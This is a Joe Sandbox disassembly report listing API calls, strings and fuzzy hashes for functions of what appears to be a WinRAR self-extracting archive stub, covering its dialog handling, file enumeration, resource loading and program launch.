Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: acc7554025e8e22b328270ca2209a0d0b96d69b9bd41175f1ed757ef76900819
Instruction ID: 6643fa6bf9f1c966e994ef2890b311543f6d6bf7468a65174e92692c75a0c3a6
Opcode Fuzzy Hash: acc7554025e8e22b328270ca2209a0d0b96d69b9bd41175f1ed757ef76900819
Instruction Fuzzy Hash: 19611571904388BFD320AB75ED49FBB7BEDAB49700F040029FA45929E2DB749984D761

Uniqueness

Uniqueness Score: -1.00%

Function 000FA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,000FB73D,00000066), ref: 000FA6D5
SizeofResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA6EC
LoadResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA703
LockResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA72D
GlobalLock.KERNEL32(00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA73E
GlobalUnlock.KERNEL32(00000000), ref: 000FA7C6

Part of subcall function 000FA626: GdipAlloc.GDIPLUS(00000010), ref: 000FA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000FA7A7
GlobalFree.KERNEL32(00000000), ref: 000FA7CD

Strings

PNG, xrefs: 000FA6C6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 859566de71ed82810eb0e97f8b246f3e48203c215257d66886ccc7adae7946e3
Instruction ID: dc33a7ead5f1e85937fb3b169ca760c07945091ddff10841121b8e8140a5ffc7
Opcode Fuzzy Hash: 859566de71ed82810eb0e97f8b246f3e48203c215257d66886ccc7adae7946e3
Instruction Fuzzy Hash: 3731D3B5604306BFC715AF21ED48D6B7FF9EF85760B004528FA1982A20EB31DC80EA61

Uniqueness

Uniqueness Score: -1.00%

Function 000EA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6C4

Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA728
GetLastError.KERNEL32(?,?,?,?,000EA592,000000FF,?,?), ref: 000EA734

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: b1608eb33b23fa0f4ef558dcc79b8179124af9f704661942de2c0701e7e341c1
Instruction ID: 9f26c7d618013e07b872d7c417945a2c17d79e2e119e11aa1d2be13a2b047bfb
Opcode Fuzzy Hash: b1608eb33b23fa0f4ef558dcc79b8179124af9f704661942de2c0701e7e341c1
Instruction Fuzzy Hash: 53419C72A00559AFCB25DF64CC88AEAB7B8FB4D350F104196F569E3200D7346E90DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00107DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107E0F
TerminateProcess.KERNEL32(00000000,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107E16
ExitProcess.KERNEL32 ref: 00107E28

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f1e9c090dbb412fecb14ad532a76ebaac325bd7bbd3a4561e80cef2e1d445ea5
Instruction ID: f57b3391f58e99bad4f2bea2646ceeb2944c4b394d6afba73dc1a079ffd3bad3
Opcode Fuzzy Hash: f1e9c090dbb412fecb14ad532a76ebaac325bd7bbd3a4561e80cef2e1d445ea5
Instruction Fuzzy Hash: 8FE04F31445144EBCF056F10DE099897F69EB14341B008454F8598A5B6CB76EE91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000E848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E8493

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6494f6645cf3f8e233fa3f4949cd58f58c99334cfc2ba74eabccef33c6e72081
Instruction ID: e62136dbd2013003371bea2128c94235f096334898e4534194e59ae941a02690
Opcode Fuzzy Hash: 6494f6645cf3f8e233fa3f4949cd58f58c99334cfc2ba74eabccef33c6e72081
Instruction Fuzzy Hash: E48209719042C5AEDF65CB65C895BFAB7B9AF05300F0881B9E85DBB283DF315A84C760

Uniqueness

Uniqueness Score: -1.00%

Function 000FB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000FB7E5

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB8EF
IsDialogMessageW.USER32(?,?), ref: 000FB902
TranslateMessage.USER32(?), ref: 000FB910
DispatchMessageW.USER32(?), ref: 000FB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000FB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000FB960
GetDlgItem.USER32(?,00000068), ref: 000FB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FB99E
SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FB9B1

Part of subcall function 000FD453: _wcslen.LIBCMT ref: 000FD47D

SetFocus.USER32(00000000), ref: 000FB9B8
_swprintf.LIBCMT ref: 000FBA24

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

Part of subcall function 000FD4D4: GetDlgItem.USER32(00000068,0013FCB8), ref: 000FD4E8
Part of subcall function 000FD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,000FAF07,00000001,?,?,000FB7B9,0011506C,0013FCB8,0013FCB8,00001000,00000000,00000000), ref: 000FD510
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FD51B
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FD529
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD53F
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000FD559
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD59D
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000FD5AB
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD5BA
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD5E1
Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001143F4), ref: 000FD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000FBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000FBA90
GetTickCount.KERNEL32 ref: 000FBAAE
_swprintf.LIBCMT ref: 000FBAC2
GetLastError.KERNEL32(?,00000011), ref: 000FBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000FBB43
_swprintf.LIBCMT ref: 000FBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 000FBBD0
GetCommandLineW.KERNEL32 ref: 000FBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 000FBC47
ShellExecuteExW.SHELL32(0000003C), ref: 000FBC6F
Sleep.KERNEL32(00000064), ref: 000FBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 000FBCE2
CloseHandle.KERNEL32(00000000), ref: 000FBCEB
_swprintf.LIBCMT ref: 000FBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FBD7D
SetDlgItemTextW.USER32(?,00000065,001135F4), ref: 000FBD94
GetDlgItem.USER32(?,00000065), ref: 000FBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 000FBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000FBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FBE68
_wcslen.LIBCMT ref: 000FBEBE
_swprintf.LIBCMT ref: 000FBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 000FBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000FBF4C
GetDlgItem.USER32(?,00000068), ref: 000FBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000FBF6B
GetDlgItem.USER32(?,00000066), ref: 000FBF85
SetWindowTextW.USER32(00000000,0012A472), ref: 000FBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000FC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 000FC0BD
EnableWindow.USER32(00000000,00000000), ref: 000FC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000FC1D9

Part of subcall function 000FC73F: __EH_prolog.LIBCMT ref: 000FC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FC1FD

Strings

LICENSEDLG, xrefs: 000FC0B2
%s, xrefs: 000FBED8
STARTDLG, xrefs: 000FB801
@, xrefs: 000FBB91
winrarsfxmappingfile.tmp, xrefs: 000FBBA6
<, xrefs: 000FBB84
-el -s2 "-d%s" "-sp%s", xrefs: 000FBB6B
C:\Users\user\Desktop, xrefs: 000FBBC9
__tmp_rar_sfx_access_check_%u, xrefs: 000FBAB5
"%s"%s, xrefs: 000FBD0D

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 61cd944bb1a571a44e92cf1d67083b4f19bbfb8fa4499cd4ed6181beabd6a5d8
Instruction ID: 69ddf594fa5a30f0622889d8452f6049d7cfba647e9d37030f1c891cf83fcfb0
Opcode Fuzzy Hash: 61cd944bb1a571a44e92cf1d67083b4f19bbfb8fa4499cd4ed6181beabd6a5d8
Instruction Fuzzy Hash: 9142D87094428CBEEB21AB60DD4AFFE77ACAB12700F044155F744B68E3CB745A85DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000F0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 000F087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000F088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000F08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000F0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000F0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00113C7C,00000000), ref: 000F0BB1
CloseHandle.KERNEL32(00000000), ref: 000F0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000F0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00113C7C,?,00000000,?,00000800), ref: 000F0C72
GetFileAttributesW.KERNELBASE(?,?,00113C7C,00000800,?,00000000,?,00000800), ref: 000F0C9C
GetFileAttributesW.KERNEL32(?,?,00113D44,00000800), ref: 000F0CD8

Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858

_swprintf.LIBCMT ref: 000F0D4A
_swprintf.LIBCMT ref: 000F0D96

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

AllocConsole.KERNEL32 ref: 000F0D9E
GetCurrentProcessId.KERNEL32 ref: 000F0DA8
AttachConsole.KERNEL32(00000000), ref: 000F0DAF
_wcslen.LIBCMT ref: 000F0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000F0DD5
WriteConsoleW.KERNEL32(00000000), ref: 000F0DDC
Sleep.KERNEL32(00002710), ref: 000F0DE7
FreeConsole.KERNEL32 ref: 000F0DED
ExitProcess.KERNEL32 ref: 000F0DF5

Strings

DXGIDebug.dll, xrefs: 000F08FC, 000F0C5E
SetDefaultDllDirectories, xrefs: 000F08B9
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 000F0D84
dwmapi.dll, xrefs: 000F0927, 000F0D0D
uxtheme.dll, xrefs: 000F0D17
kernel32, xrefs: 000F0873
SetDllDirectoryW, xrefs: 000F0888

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 95af858fd0c4236cad9a50fe18df717ce5d971d7933189c1ad52f7c219f6549c
Instruction ID: 49969e6b63877d64b09ddb1a591e0e66f091e4bb50df0e73b521cb338e0c2b66
Opcode Fuzzy Hash: 95af858fd0c4236cad9a50fe18df717ce5d971d7933189c1ad52f7c219f6549c
Instruction Fuzzy Hash: 94D1A5B1008384AFD738DF50DA49BDFBBE8BB84704F40492DF299B6145C7B08689CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000FC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 000FC744

Part of subcall function 000FB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 000FB3FB

_wcslen.LIBCMT ref: 000FCA0A
_wcslen.LIBCMT ref: 000FCA13
SetWindowTextW.USER32(?,?), ref: 000FCA71
_wcslen.LIBCMT ref: 000FCAB3
_wcsrchr.LIBVCRUNTIME ref: 000FCBFB
GetDlgItem.USER32(?,00000066), ref: 000FCC36
SetWindowTextW.USER32(00000000,?), ref: 000FCC46
SendMessageW.USER32(00000000,00000143,00000000,0012A472), ref: 000FCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000FCC7F

Strings

ProgramFilesDir, xrefs: 000FCB45
<br>, xrefs: 000FC9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 000FCB1A
%s.%d.tmp, xrefs: 000FC940

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: aa44e662772b6a37509c2de03051897245749421f0ffe1fe745121f6207b0221
Instruction ID: 9d8a8c8b3cfafb878b5109d963ed2b2dae86125011efd46e3e2ba201c168e575
Opcode Fuzzy Hash: aa44e662772b6a37509c2de03051897245749421f0ffe1fe745121f6207b0221
Instruction Fuzzy Hash: BDE161B290025CAADB24DBA0DD86DFE73BCAB05350F4441A6F749E3491EB749F849B60

Uniqueness

Uniqueness Score: -1.00%

Function 000EDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000EDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000EDAAC

Part of subcall function 000EC29A: _wcslen.LIBCMT ref: 000EC2A2

Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0

Part of subcall function 000F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000EBAE9,00000000,?,?,?,000204A2), ref: 000F1BA0

_wcslen.LIBCMT ref: 000EDDE9
__fprintf_l.LIBCMT ref: 000EDF1C

Strings

*messages***, xrefs: 000EDBFA
R, xrefs: 000EDC0C
RTL, xrefs: 000EDEDE
a, xrefs: 000EDC16
$%s:, xrefs: 000EDEFF
*messages***, xrefs: 000EDBC1
, xrefs: 000EDD6C
,, xrefs: 000EDF57
@%s:, xrefs: 000EDF06, 000EDF12

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: e331553263f1d1b01c0fd45c6d5737fddf83951047a2c2bbc03ce3f0a9cf6436
Instruction ID: 1e2fc7abdb445389dd7d4bc783279a7ad36a05ebf4cb1af835660e1839b558e9
Opcode Fuzzy Hash: e331553263f1d1b01c0fd45c6d5737fddf83951047a2c2bbc03ce3f0a9cf6436
Instruction Fuzzy Hash: 1332E271900298DFCF68EF65CC45AEE77A9FF14300F40056AFA45AB292E7B19D85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000FD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6

GetDlgItem.USER32(00000068,0013FCB8), ref: 000FD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,000FAF07,00000001,?,?,000FB7B9,0011506C,0013FCB8,0013FCB8,00001000,00000000,00000000), ref: 000FD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FD51B
SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000FD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000FD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD5E1
SendMessageW.USER32(00000000,000000C2,00000000,001143F4), ref: 000FD5F0

Strings

\, xrefs: 000FD549

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 54756857fe4b10de885d2b9441a15e1162067260fc8cb746a7119acb58479067
Instruction ID: 5795b5166c63fd0cb170444a46182a3a028694b992f1192698b2e13143373e6c
Opcode Fuzzy Hash: 54756857fe4b10de885d2b9441a15e1162067260fc8cb746a7119acb58479067
Instruction Fuzzy Hash: CE312471145746BFE311DF20DC1AFAB7FACEB83708F000619F661965A0DBA48A45CB76

Uniqueness

Uniqueness Score: -1.00%

Function 000FD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 000FD7AE
ShellExecuteExW.SHELL32(?), ref: 000FD8DE
ShowWindow.USER32(?,00000000), ref: 000FD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 000FD959
CloseHandle.KERNEL32(?), ref: 000FD97F
ShowWindow.USER32(?,00000001), ref: 000FD9E1

Strings

.exe, xrefs: 000FD989
